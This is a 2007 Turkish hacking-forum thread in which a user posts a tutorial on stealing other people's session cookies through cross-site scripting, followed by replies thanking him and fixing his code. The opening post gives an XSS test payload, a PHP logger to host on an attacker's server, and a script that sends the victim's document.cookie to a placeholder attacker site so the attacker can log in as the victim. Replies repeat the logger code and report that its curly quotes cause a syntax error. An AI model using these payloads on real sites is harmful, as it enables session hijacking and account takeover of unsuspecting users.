XSS Ve(İle) Cookie Çalarak Hacking

Tahribat.com Forumları
line

Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
line

28/Tem/07 06:18 Kısayol Şikayet Özel Mesaj

AntiOksidan

Kayıt Tarihi: 03/Ekim/2005

Selamlar…
Bu dökümanda xss ile cookie çalma ile hackingten bahsedeceğiz ama öncelikle XSS ten bahsetmek istiyorum…
XSS,Cross site scripting anlamına gelir yani çapraz site betiklemesi.Bazı karakterlerin filtrelenmemesi sonucunda sitede javascript çalıştırılarak tehdit oluşturulabilir.
Çeşitli komutlarla bir takım işlemler yapabilir,şimdi ki konumuz ne,cookie,bu yöntemle cookie de çalabilir o yüzden XSS i şimdilik bırakıp(zaten en basit anlatımı budur) cookie nedir onu tanımlayalım.
Cookie/çerez sitenin sizi tanıması için size atadığı bir değerdir.Site sizi bu değerden tanır.”Beni hatırla” gibi seçeneklere imkan sağlayan da cookielerdir,yani yukarıda az önce belirttiğim gibi cookie kimliğimizdir ,kimliğimizi değiştirir,bir başka kimliğe bürünürsek o kimlik altında işlemler yapabiliriz
Az önce demiştim bu işlemleri yapmak için javascript çalıştırmamız lazım,bunun için javascript kodu gerekli kodumuz şu…
<script>alert(”document.cookie”);</script>

Bu komutu kullanıcaz,bunu sitenin search bölümünde de kullanabiliriz ya da url sonuna ekleyerek te deneyebiliriz şöyle;
www.hedefimiz.com/.....javascriptkodumuz (benim javascriptkodumuz yazdığım yere siz yukarıdaki kodu yazıcaksınz)
Burada sayfada kullanıyoruz.Eğer sitede açık varsa biz cookieyi görücez ama kendi cookiemizi .Tabi bize kendi cookiemiz lazım değil :S.Başkasının cookiesini görmemiz için bunu başkasının tıklaması lazım,onun değerlerinin gelmesi lazım.Bunun için bize sniffer lazım olucak,kodları veriyorum(ben yazmadım );
<?php
$cookie = $_GET[’cookie’];
$fp = fopen(’log.php’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
’);
fclose($fp);
?>
Bu kodu hostumuza atıyoruz,bilmemne.php olarak kaydedin (bilmemne dediğim nasıl kaydetmek istiyorsanız yani).Ondan sonra yapacağımız işleme gelelim;

<script>location.href=’http://www.seninsiten.com/bilmemne.php?cookie= ‘%2Bescape(document.cookie)</script>
Burada seninsiten.com/bilmemne.php cookie çalma dosyasını attığınız yer olacak ve bunu tıklatacaksınız,tabi direk olarak bunu tıklatmanız bir işe yaramaz.Adamın site deki cookiesini çalmak istiyoruz çünkü…
Bunu az önce yukarıda /… şeklindeki linkin sonuna ekliyoruz yani javascript kodumuz dediğimiz yere,bunu yaptığınızda o kişinin cookileri size geliyor ve o cookileri kullanıp(çeşitli programlarla,örneğin:cookie editor) o kişi adına giriş yapabiliyorsunuz…
kolay gele…. AntiOksidan/anlatım yaptığım blogumda yazdım önce ordan direk c/p ettim o yüzden smiley çıktı bi de kırmızı yazı: D
not: saat 06:20 bi hata olmuşsa affola,bayılacam yorgunluktan :D

Alıntı yap
28/Tem/07 06:25 Kısayol Şikayet Özel Mesaj

wasd

Kayıt Tarihi: 14/Haziran/2006

Helal olsun bu saatte valla :D

:)

Alıntı yap
28/Tem/07 06:28 Kısayol Şikayet Özel Mesaj

ArmadA

Kayıt Tarihi: 08/Ekim/2005

anti seni öpebilirmiyim hacı :D teşekkür ederiz verdiğin bilgiler hakkatten gözden kesinlikle kaçmayacak değerli dökümanlar...

Living Death

Alıntı yap
28/Tem/07 06:47 Kısayol Şikayet Özel Mesaj

cold-m4

Kayıt Tarihi: 12/Temmuz/2007

bu saatte bu performans, helal hacı işe yarar bir döküman ;)

Alıntı yap
28/Tem/07 08:39 Kısayol Şikayet Özel Mesaj

amele_2

Kayıt Tarihi: 01/Eylül/2005

bari sniffer ın kodunu tam ver lan :D

Ardından yüz köpek havlamayan kurt, kurt sayılmaz..

Alıntı yap
28/Tem/07 15:03 Kısayol Şikayet Özel Mesaj

AntiOksidan

Kayıt Tarihi: 03/Ekim/2005

Sniffer kodu tamamdır mesajı editlerken

<?php kodu

kaybolmuş,ekledim,sorun yok amele ne yaygaracı adamsın ak : D

Alıntı yap
28/Tem/07 15:10 Kısayol Şikayet Özel Mesaj

warlife

Kayıt Tarihi: 09/Mart/2007

<?php
$cookie = $_GET[’cookie’];
$fp = fopen(’log.php’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
’);
fclose($fp);
?>

tabii sacma da gelebilir. o kadar bilgim yok bu konuda ama bu kodu asp seklinde de yazılabilir mi ? illa ki php mi olması gerekir.

diyalektik için kesin, mutlak hiç bir şey yoktur..Her şeyin bir geçmişi vardir ve bir geleceği olacaktır. Her şey bir kez bulunduğu yerde her zaman icin kesin olarak bulunmaz, ve o bugünki o,kesin ve son değildir

Alıntı yap
28/Tem/07 15:12 Kısayol Şikayet Özel Mesaj

inside
anonim6918524

Banlanmış Üye

Kayıt Tarihi: 16/Temmuz/2005

Sabahın 6sında döküman yazmış adam :) Tebrikler..

λ

Alıntı yap
28/Tem/07 15:18 Kısayol Şikayet Özel Mesaj

AntiOksidan

Kayıt Tarihi: 03/Ekim/2005

warlife;
Ben php kodunu kullanıyorum,ama asp de yazabilirsen/bulabilirsen olur neden olmasın

Alıntı yap
28/Tem/07 15:18 Kısayol Şikayet Özel Mesaj

yolbulucu

Kayıt Tarihi: 06/Nisan/2007

warlife bunu yazdı:
-----------------------------
?>?>?>$cookie = $_GET[’cookie’];
$fp = fopen(’log.php’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
’);
fclose($fp);
?>

tabii sacma da gelebilir. o kadar bilgim yok bu konuda ama bu kodu asp seklinde de yazılabilir mi ? illa ki php mi olması gerekir.

-----------------------------
.jsp .cfm .asp .vs vs vs farketmez sunucu tabanlı bir dil olsun yeter
edit: kod hatalı abüler : Parse error: syntax error, unexpected ':' in /x/x/public_html/1/1.php on line 4
:S

29.99cm, titanyum kaplamalı, çift damarlı, su ve yağ soğutmalı.

Alıntı yap
28/Tem/07 16:23 Kısayol Şikayet Özel Mesaj

AntiOksidan

Kayıt Tarihi: 03/Ekim/2005

<?php
$cookie = $_GET[’cookie’];
$fp = fopen(’log.php’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
’);
fclose($fp);
?>
bu olucak,aynısını ben kendi hostuma attım sorun yok, cookieyi " " arasına alın
not: phpci sandmane teşekkürler mucks : D

Alıntı yap

Toplam Hit: 3148 Toplam Mesaj: 15

Cevapla